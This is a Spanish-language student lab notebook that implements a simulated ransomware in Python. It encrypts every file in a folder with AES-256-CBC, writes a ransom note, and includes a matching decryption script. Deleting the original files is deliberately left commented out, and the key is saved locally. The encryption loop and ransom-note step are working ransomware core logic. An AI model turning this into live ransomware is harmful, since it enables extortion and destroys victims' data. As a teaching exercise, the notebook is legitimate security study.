# Laboratorio 2 - Parte 4: Implementación de un Ransomware Simulado
## Cifrado de Información
### José Daniel Gómez Cabrera 21429

In [40]:
import os
import secrets
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

### Crear un script que cifre archivos de texto con AES
- Prueben realizar el script en un folder con varios archivos

In [41]:
def generate_key():
    return secrets.token_bytes(32)  # 256 bits = 32 bytes

#### Encriptar los 3 archivos del folder "directory"

In [42]:
def encrypt_file(file_path, key):
    try:
        iv = secrets.token_bytes(16)

        with open(file_path, 'rb') as f:
            data = f.read()

        padder = padding.PKCS7(algorithms.AES.block_size).padder()
        padded_data = padder.update(data) + padder.finalize()

        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
        encryptor = cipher.encryptor()
        encrypted_data = encryptor.update(padded_data) + encryptor.finalize()

        encrypted_with_iv = iv + encrypted_data

        with open(file_path + '.encrypted', 'wb') as f:
            f.write(encrypted_with_iv)

        # un ransomware real eliminaria el archivo original, pero lo dejo por propositos de demostracion del laboratorio
        # os.remove(file_path)

        return True
    except Exception as e:
        print(f"Error al cifrar {file_path}: {e}")
        return False

#### Encriptamos los archivos (simulando un ransomware)

In [43]:
directory = "directory"
os.makedirs(directory, exist_ok=True)

test_files = ["file_1.txt", "file_2.txt", "file_3.txt"]
for file in test_files:
    file_path = os.path.join(directory, file)
    if not os.path.exists(file_path):
        with open(file_path, 'w') as f:
            f.write(f"Este es un archivo de prueba: {file}")
        print(f"Archivo creado: {file_path}")

# la clave es aleatoria para que sea mas dificil descifrarlo a la fuerza
key = generate_key()
with open('key.bin', 'wb') as f:
    f.write(key)
print(f"Clave generada y guardada en 'key.bin'")

# ciframos todos los archivos, recorriendolos con os.listdir
count = 0
for file in os.listdir(directory):
    file_path = os.path.join(directory, file)
    if os.path.isfile(file_path) and not file.endswith('.encrypted'):
        if encrypt_file(file_path, key):
            count += 1
            print(f"Archivo cifrado: {file_path}")

# es necesario un archivo de rescate para que nuestra 'victima' pueda entender que hacer
with open(os.path.join('RESCATE.txt'), 'w') as f:
    f.write("¡Tus archivos han sido cifrados!\n")
    f.write("Este es un simulacro educativo de ransomware.\n")
    f.write("Utiliza el script para desencriptar con la clave que esta en key.bin para recuperar tus archivos.\n")

print(f"\n{count} archivos han sido cifrados.")
print("Dejado mensaje de rescate en RESCATE.txt")

Clave generada y guardada en 'key.bin'
Archivo cifrado: directory/file_1.txt
Archivo cifrado: directory/file_2.txt
Archivo cifrado: directory/file_3.txt

3 archivos han sido cifrados.
Dejado mensaje de rescate en RESCATE.txt


### Implementar una clave de descifrado en otro script.

In [44]:
def decrypt_file(file_path, key):
    try:
        if not file_path.endswith('.encrypted'):
            print(f"Omitiendo {file_path} - no parece ser un archivo cifrado")
            return False

        with open(file_path, 'rb') as f:
            encrypted_data = f.read()

        iv = encrypted_data[:16]
        actual_encrypted_data = encrypted_data[16:]

        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
        decryptor = cipher.decryptor()
        padded_data = decryptor.update(actual_encrypted_data) + decryptor.finalize()

        unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()
        original_data = unpadder.update(padded_data) + unpadder.finalize()

        original_file_path = file_path[:-10]  # Remueve '.encrypted'
        with open(original_file_path, 'wb') as f:
            f.write(original_data)

        # deberia eliminarlo pero lo dejo por propositos de demostracion del laboratorio
        # os.remove(file_path)

        return True
    except Exception as e:
        print(f"Error al descifrar {file_path}: {e}")
        return False


In [45]:
input("Presiona Enter para descifrar los archivos!!!")

directory = "directory"

# Lee la clave del archivo key.bin
try:
    with open('key.bin', 'rb') as f:
        key = f.read()
except FileNotFoundError:
    print("Archivo de clave 'key.bin' no encontrado.")

# Descifra todos los archivos en el directorio
count = 0
for file in os.listdir(directory):
    file_path = os.path.join(directory, file)
    if os.path.isfile(file_path) and file.endswith('.encrypted'):
        if decrypt_file(file_path, key):
            count += 1
            print(f"Archivo descifrado: {file_path}")

# deberiamos eliminar el archivo de rescate pero lo dejo por motivos de demostracion del laboratorio, para que se pueda ver los archivos de procedimiento
# ransom_note = os.path.join(directory, 'RESCATE.txt')
# if os.path.exists(ransom_note):
#     os.remove(ransom_note)

print(f"\n{count} archivos han sido descifrados exitosamente.")

Archivo descifrado: directory/file_3.txt.encrypted
Archivo descifrado: directory/file_2.txt.encrypted
Archivo descifrado: directory/file_1.txt.encrypted

3 archivos han sido descifrados exitosamente.
